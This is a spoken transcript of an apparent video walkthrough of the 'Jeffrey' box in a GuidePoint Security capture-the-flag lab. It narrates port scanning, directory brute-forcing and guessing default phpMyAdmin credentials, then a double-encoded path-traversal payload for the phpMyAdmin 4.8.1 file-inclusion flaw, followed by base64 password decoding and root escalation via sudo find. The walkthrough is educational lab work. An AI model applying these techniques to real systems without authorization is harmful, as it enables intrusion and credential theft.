 Hello everyone, my name is John Hammond and in this video We're gonna be taking a look at some of the challenges from the guide point security CTF or the capture the flag event That was running this past week. So I am connected to their VPN I'm logged in on the scoreboard at 1010 100 100 and I can hop on over to the challenges So I want to release a couple videos showcasing these different challenges We have some network machines that we can take advantage of and we also have a simple challenge here That doesn't really fit in any other category. There is of course a sanity check challenge That is just a simple hey copy and paste the flag you can go ahead slap that in and get your 100 points But in this video, I want to showcase the Jeffrey box and that is located at this IP address 10 10 22 And if I open up this first challenge here It says Jeffrey is a network device hosted at that IP address Your goal is to enumerate this device like you would in a penetration test That means you can run Nmap, Nikdo, Durbuster, Metasploited, etc And there are multiple flags on this challenge You need to submit each one in their respective challenge card as we can see on the CTF D board This challenge is for Jeffrey one You will still target that same IP address for the next set of the flags The flags may be found in different locations like source code flag dot text files and others So let's go ahead and start to attack this box and now that we have all that information set So I'm gonna hop over to my terminal and I already have a directory created here I'm gonna be working for this specific CTF. And again, this is a rolling CTF They're gonna be doing a one-week game for like the next couple of months So it's super duper fun. You should jump in and we've got this Jeffrey directory and folder created Let's make an Nmap directory so we can store our Nmap scans and I'll go ahead and kickstart an Nmap scan with default or safe scripts tack on To output to a specific directory and format here with the Nmap format tack SV to enumerate versions And of course the IP address which we know is 10 10 22 So I can slap that in and Nmap will go ahead and run now when Nmap does this with the default kind of settings here You aren't specifying any specific ports to enumerate. It'll look through the most common at 1,000 We can see that 22 or SSH that port is open and accessible It looks like we've got the version as we've specified in our tack SV parameter and flag there And we have it running on a new Buntu server. That means we're we know we're working on Linux here We also have port 80 open or HTTP for a web server and it looks like that is hosted with Apache and The title as we can see through our scripts is simply Jeffrey So we could start to enumerate this SSH on port 22 That's normally going to take command line and console access But we need credentials to be able to log in we don't have credentials yet So we'll have to enumerate that port 80 now I mentioned though Nmap is only going to scan the like most common 1,000 ports, but there are 65,535 possible and potential ports So we could kick this off with a larger Nmap scan saying tack be tack and then if we're gonna go across all those ports We might as well go all the way and use attack capital a flag to be aggressive and scan for just about everything that we can What Nmap knows how to do that is aggressive and will make a lot of noise And maybe we don't need to do that across every single port We can kind of trim that down and actually just use rust scan I really really like rust scan It's going to use rust to make the scanning process much much faster It'll look through all of the like 65,535 ports first And then the ones that it finds it'll pass that to Nmap and Nmap will then be aggressive on those specific ports So you can install rust scan if you'd like to you can do some googling And I'm running it as a docker image in this case But you just simply run rust scan if you set up the alias and pass in the IP address So if I were to simply slap that in it sees port 22 and port 80 open as we saw earlier But it also sees a new port 58,008 So let's go explore that because we don't exactly know what it is And we should also take a look at that web server on port 80. So we've got the IP address I can open it in my browser and who are greeted with just this Jeffrey and we've got a little meme Gif here who could be scared of a Jeffrey nice I could right-click and like view page source or hit control you on my keyboard and zooming in on this We don't really have anything here other than bare bones classic HTML. It doesn't look like there are any secrets. Oh Actually scrolling I'm using my horizontal scroll bar to move all the way to the side here We are seeing one flag storm CTF Jeffrey one and some simple hash value We could copy and paste there we go. That is one flag that is our first flag and we could simply submit that just by viewing The source of the HTML. That's a good practice a good thing to do because they might hide things from us There might be HTML comments that leave behind developer notes or anything like that It's always a good practice to view the source of the web page We could see this if we were to run this with like curl or use a command line tool to get the request Information and not have it just rendered out in our browser because Firefox or Chrome is gonna read and interpret this HTML CSS JavaScript, but if we want that raw data just viewing the source and looking around being I don't know a little More intrusive just hey, let's examine everything that we can see here. That's a good thing to do There's our first flag, but there aren't any other links on this page So there doesn't seem to be anything interesting that we could poke around But that doesn't mean that there aren't other files or things being hosted on this web server Without any other link to them other than the silly Jeffrey jiff we could try and brute force them or scan for them So I'll go ahead and do that I'll kick off Nikto and I'll use tack H not with the flag But with the IP address and you have to specify the HTTP schema if you want to use this so 10 10 22 And I will tee that out to a Nikto dot log file so I can save the record of it I'll also create another terminal and Let's run der buster or go buster that I like to run because it's based off the command line We'll run go buster in der mode and we'll specify the URL with tack you again Noting the HTTP schema 10 10 202 or sorry 22 and Then we'll specify the word list that we want to use with tack W This is going to give it the list of locations that it will try and brute force and scan and find so I actually will use the Der buster list that's the directory list lowercase medium And I just have that saved in my op directory so I could fire that off if I hit enter on this There go buster will go do its thing and it found actually a WordPress server, which is interesting Okay, we could I suppose go check that out We'll hop over on 10 10 22 and Now we have Jeffrey's blog, which is just another WordPress site. Okay interesting We could probably do some other enumeration like using WP scan or other command line tools to look for this stuff Let's see if there's anything else. Maybe that Nikto had found also We can't forget we do have one other port that we should access if we go to that 58,000 and eight We can open this up in our web browser Although we aren't sure if that's what it's going to return with we could just use netcat or something like a socket to connect to it But opening up in our web browser. We see this butterfly thing that looks like It is connecting to the machine and offering like a login prompt here So if I had credentials probably I would be able to try and log in I'm just guessing route and tour, but okay. Nope. That looks like that's wrong So that's not gonna let me in but that's good to know. Okay, if we had credentials Maybe we could access this machine in a different way taking advantage of that port. So Let's go check out more of our Nikto and Durbuster scans looks like Nikto is finding a lot of strange headers Go buster down here has actually found PHP my admin. Ooh, and that is worthwhile and interesting to look at So let's go explore that before we dive into this WordPress and we just have a simple login for PHP my admin At this point again, we don't know credentials what we could do when we were accessing that butterfly is Try to just guess some common or default or weak credentials username and password pairs We could brute force this we could use Hydra or any other tool and before we do that Which we might still want to do we could go for the simple low-hanging fruit, right? Hackers always going to go for the path of least resistance if it's a default or super duper common password and username Well, we're not going to try and break through the window if you just left your front door unlocked So let's try admin and admin as a simple username and password and that fails Okay username and admin and password admin is going to give us an access denied. Let's try admin password. Oh That looked like it worked. Okay, so now we're logged in to PHP my admin We have a lot of information over on the side here for the database. It looks like we are running Jeffrey right my SQL server and that's what PHP my admin is going to help work with that's the kind of purpose of that utility We also see the user here, and we've got this interesting marquee going on. Oh, and there's also a flag here I see storm CTF learners net Jeffrey and I cannot easily see that So let's again right-click to view the page source or hit control you There's a lot of stuff in here, so I'm just going to search for what we know that key is let's storm CCF I hit control f on my keyboard here, and There we go There is our flag and we can copy that and go ahead and paste that in on the scoreboard Jeffrey to for 200 points slap that in right there, and there are our point values great What was that marquee saying? It says Aldous quit using the admin account We removed the permissions and we saved your password at var www Aldous dot text. Ah Okay That's Good to know. Can we access var? www Aldous dot text? We can't like go to that in the web browser, can we if I just try to go to Aldous dot text now that doesn't work so Looking at a web server right a web server is often configured with like their document route or where in the Local server file system or all these files and folders going to be stored that the web server will be able to actually serve and Give to to clients Typically for Apache that is set up that document route is configured to be var www HTML and that's a folder So trying to access files above that or in different locations other than that on the file system We won't be able to access them unless we had some sort of vulnerability If there were some means to be able to access other files on that web servers file system a really really good Technique that you can use to do this is by abusing local file occlusion local file inclusion is a vulnerability though So we have to be able to see if maybe the services that we're working with or what we found on this web server Have that software flaw and are vulnerable to that technique of local file inclusion So we know though that we're working with PHP my admin and it is just going to outright tell us its version number and version Information looks like we're working with four point eight point one Neat with that information knowing the software name and the software version number We could probably do some research. We could do our hacker homework, right? And go see if there are any known public vulnerabilities or exploits are kind of off the shelf like attack scripts and code We could use to take advantage of the software. Let's do that I'm gonna hop over to my terminal one more time And I don't think we need go buster or Nito here because we've got some decent Athe way or pathways or avenues we could look down So let's use search exploits which will comb through the exploit DB or exploit database You can find online and we'll see if there are any known public vulnerabilities for this sort of thing we'll search for again just passing in arguments and Specifying the software name and version number what we know here PHP my admin and that should be four point eight point one Now if I search for that, I do see PHP my admin four point eight point one With an authenticated local fill. So that sounds kind of interesting. I'll zoom out here. So search exploit can actually Include the proper title and it says, okay, we do have local file inclusion We're given a path that we could go ahead and use search exploit will allow us to simply examine here We know we're authenticated already because we were able to log in as the admin user with the password password so let's use search exploit and Let's use tack x to examine and pass in this path that it's returned to us X will just simply let us view the exploit and since it's like a dot text file It might just be general information or description or like a little blog post or article Explaining what this vulnerability is if it were something like a dot c or dot py or any other file extension for Normally executable code then we can assume. Hey, okay. That's an already built out exploit Let's just take a look at what this dot text file might include here It says the latest version downloaded from the official website The file name is PHP four point eight point one all languages dot zip the problem appears in index dot PHP If you were taking a look at the source code You could find the issue in these source lines and line 61 contains an include request target if you see include within PHP and it's not sanitized or it's not kind of Cleaned up to validate against user input the user could supply something a little bit more malicious and do some more damage with that Include again without any clean parameters could offer Local file inclusion if we were to bypass the 55 to 59 restrictions that follow on those source code lines line 57 it restricts the target parameter has to begin with index I Think if that's what that explains line 57 Restricts the target parameter from beginning with index. Okay. So yeah, we can't just simply include index at the very very start line 58 Limit the target parameter cannot appear within target blacklist the target blacklist definition and that's a variable here That's on these lines That's still again found on the source code as long as the target parameter is not import dot PHP or export dot PHP the last limit is core check page validity on The request that we've specified with that target parameter we could check that out and that just explains it. Okay All that's doing is using URL decode and that's another function that will be able to kind of process the URL encoding representation of stuff so Normally, if you were to try and pass like a pound symbol or that will hashtag the octo Thorpe That might mean an anchor in HTML or like a specific link on a page that you might be trying to reference So if you want to pass that as real data, you will URL encode that with a percent sign and sort of its hex representation Sometimes that can be kind of manipulated because you could encode the encoding and Trick some programs that work with this So in this case you we can see the payload here is twice or double encoding that percent sign and technique again The percent 25 is going to actually evaluate to a percent sign and then the 3f that's left over will access Okay, maybe a dot dot or forward slash or whatever that might specifically be we can bypass the validation So we're given an example payload here where they're using Some proof of concept address with PHP my admin going to index dot PHP Supplying this target value and they're using DB SQL dot PHP That's just going to act as kind of a dummy because we know it can't be that importer export dot PHP from what we read above and Then we'll try to climb the file system We're going to use a forward slash and a dot dot to move up the parent directory And we'll keep moving up and up until we hopefully eventually reach the route of the file system That will allow us to climb to any file that we might want within the file system like var Dub-dub-dub all this dot text which we know we have credentials stored. So let's try and copy this payload here We know we're going to PHP my admin with an index dot PHP target and we'll climb up They're going to simply be using a windows win.init.ini file But we know that we could try and get to var dub-dub-dub all this dot text So let's remove all of those windows notions there and let's just get to var dub-dub-dub all this dot text in our URL and There we go. It says all this this is a really insecure way to store your password So we encoded it so that no one can ever get it without knowing how to decode it your encoded password is simply this Okay This looks like base 64 encoding and the way that I know that is just kind of I guess experience and gaining familiarity with it when I notice a random assortment of capital letters and lowercase letters and some numbers thrown in especially You you gain an eye for it and noting that that is base 64 encoding another Incredible telltale is the fact that these equal signs are included at the end So base 64 that encoding scheme always have to has to result in a multiple of four in Length so if the regular encoding scheme what it tries to do to operate on that data Represented in a different way if it doesn't end in a multiple of four in length It'll add on These equal signs as padding so that the final representation does reach a multiple and four in length So whenever you see these equal signs, that's base 64 padding and that might be a really good indicator that hey This is base 64. So let's go ahead and decode it I will grab that and copy and paste it throw it on the command line here And I will base 64 attack D But I will need to supply what I actually want into the program to be decoded So I'm gonna echo right before I run that command echo grab this line on standard output And then pipe that into base 64 minus D to decode it Looks like I see get him to the Greek in Leedspeak. So now we've got some credentials here. Let's just take note of this I'll say nano creds dot text all this that user Assuming is a user right and he has this password get him to the Greek Now we potentially have credentials So we could try and log in with that butterfly server the port that we saw on 58,000 and 8 or we also know that there is SSH accessible Let's SSH and log into it. I'm gonna do that with ponkat because I really like ponkat. I will Open a another terminal here and I'll move to get ponkat Which I just have cloned and downloaded. I'm gonna get pulled to make sure there are any other changes I'm gonna grab them and download them now looks like I'm already up to date. So I can activate my Virtual environment. I will source environment been activate now I'm in the ponkat virtual environment and I can simply run Python tack em Specify a module. I'll use ponkat because that operates as a module and then I will specify the SSH like syntax I'll specify Aldous at 10 10 22 That should prompt me for a password. So I will pass in The password that we have I had that copied and pasted and now ponkat can connect. So that was the correct password Awesome. So ponkat is great because it gives us just a little shell that we can bump around and use Either working as a netcat handle to get a reverse shell or connect to a bind shell or SSH in this case And now we can move into that home directory as that user. I see that there is a flag dot text file there I'll check the permissions on that looks like that flag dot text is owned by Aldous or our current user So I could simply cat flag dot text and there we go now. We have that flag number three Go ahead and paste that in perfect and let's get back to the box and Start to do some more enumeration because right now we're acting as this Aldous user But that is likely a low privilege user and we want to fully compromise this machine We want to get the root user or root privileges and access So we'll try to look for a privilege escalation vector We can enumerate do our homework do some research try to find any Misconfigurations on this box to be able to do that ponkat will automate that You could also just run Limpies or some like Scripts and automated tools that might help you look for privilege escalation vectors We could go ahead and run if we mark Limpies as executable We could dot slash and run Limpies or if that wasn't already on the box We could try and upload it and bring it in there in our case We'll let ponkat do all the work So I hit control D to just hop to a local terminal which will give me Access to control and automate the victim or what I'm connected into with some other scripts We could run some specific commands like enumerate gather and that will simply look For all of the things that Limpies might look for but do it through ponkat So ponkat can be smart and kind of know and understand how it could leverage and take advantage of the things that it finds There is a lot of data here But if I were to run that enumerate gather and understand what that might be running I can see the results here. Okay. It's at Ubuntu server that we saw Specific version number 1604 looks like where some file systems mounted We have potential passwords found in different file system locations and there is a lot that might very well be false positives It's kind of hard to find what could be a password and what might not be we could check ASLR or address space Layout randomization apparently that is enabled We could see the running processes and who's running them what process ID and what command was used to start them etc etc And we could also see some interesting pseudo rules or configurations that will allow us to run commands as root or that super user Super user do or pseudo allows us to run those that user aldis that we're running as can run find as Any user on this machine without a password? That's awesome. We could probably take advantage of that. That looks like a really good privilege escalation vector There are other potential things that Enumerate gather will find for us like the hostname and network interfaces set SU ID or Suid binaries that could be run and take the privileges temporarily of another user an old version of pseudo Maybe potentially this is dirty cowable for a kernel exploit etc etc and cron tabs so That was great We had poncat do our enumeration that lin peas could have done or we could just do it manually with like a find tack perm 4000 to find set you ID binaries or in the case of the pseudo command you could use pseudo tack L to list to List the potential pseudo commands You can run as root in this case no password We can run find now find is a built-in program on Linux systems that we could abuse to actually Gain a shell and if we can run that as root we can gain a shell as root We could compromise this machine you typically can do that with a good resource from gtfobans And if I were to simply Google a gtfobans that is a great resource It's a curated list of unix binaries that can be exploited and attacked to Potentially elevate your privileges or do anything else you could search for whatever binary you might be working with in our case We know we're looking for find so I'll type that in And we can see hey fine can be used to execute and break out of a restrict environment by just spawning a simple shell And this is the syntax that we could use to do that There's the command and the arguments and that's passed along You could do this with a set uid or you could do it with pseudo and pseudo is the avenue that we know We want to use because this machine has that configuration So we could just simply run that command and we could get a shell Slap it in And looks like i'm root if I run who am I I'm root and we could see that reflected in our prompt Pwncat looks like it's kind of failing trying to figure out how to Properly interpret the prompt here, but let me show you how this is really cool because gtfobans is a Like functionality that pwncat knows and understands just as well So if I were to again hop back to the local prompt and let pwncat run escalate Dot auto It could try and figure out what potential routes it knows that it can abuse to get pseudo permissions or Privilege escalate to a different user Maybe some lateral escalation move to a different low privilege user or follow down a chain to eventually get root That's kind of neat and that's kind of cool Pwncat just knows how to do this if it finds a gtfoban and it knows how to execute it It can just get the shell. So let's try to exec and run That same gtfoban syntax And now we have gotten a shell as root if I were to move out of this pwncat prompt You can see hey now i'm the root user. I'll run who am I one more time I am in fact root. So pwncat just did it for us. That was kind of awesome That's kind of great. You could just simply get on this box with pwncat run escalate dot auto Exec and then your root very nice very very nice I showed you that to denote the different ways to go about this Kind of the manual way and the automated way with pwncat. Let's go ahead and grab that root flag It still thinks that my home directory is home altus So if I just simply were to type cd it would bring me there But I know that the root directory home directory is slash root So because I'm the root user because I've compromised this box I can now go ahead and just hop in that directory. I can cat out the flag dot text that is present in there And there we go. I have jeffrey 4 and I have fully compromised this machine I'll go ahead and submit that for 400 points and this jeffrey box can be done Awesome. So that was fun. That was a that was a blast. There was a lot to work through there Some good simple stuff If you have any interest in how pwncat does that pwncat has a big long configuration file That is figuring out what it can do with these gtfobans, right? So it's I believe in the data directory of not just pwncat itself, but in the pwncat module So you'll move into pwncat pwncat and then data Then you'll find a file or gtfobans.json and I'll open this up here But this is minified and compressed so let's try and make that a little bit more readable I'll use jq to process that gtfobans.json I think I need to cat that out and then just pass it into jq for a centered input And there we go. Now I have a ton of outputs and I will actually copy and paste that in my clipboard with xclip Can I jq period? There we go Awesome. Now I will move that into my Sublime text editor and Mark the syntax as json so I can get some good syntax highlighting And you can see all of these different types of commands that could be able to actually execute Different capabilities like writing a file or reading a file or gaining a shell If I were to look for that find command you can see Okay, it has an understanding of how to get a shell with the payload Supplying these specific arguments that you saw in gtfobans that online resource You could also try and do unique things like read or write or all of these and this is obviously a very very long file There is support for all the different gtfobans that the gtfobans website Knows at the moment kind of cool kind of neat Okay, that is enough of a safari ride. I hope that was fun I hope we had a good time exploring that jeffery box and cruising through one of the first simple Again, it's meant to be beginner friendly. It's meant to be kind of hand-holding It's meant to be something for you to learn from in the guide point security capital flag exercise So I hope you will join me in the later videos where we showcase more of these different boxes and the challenges that we can Work through and when guide point security does this again next month for another week-long capture the flag event You'll jump in you'll play you'll poke around in practice and sharpen your skills because that's what this is all about So it's been a long video, but I want to showcase some cool stuff here. Thanks so much for watching everybody I'll see you in the next video. Take care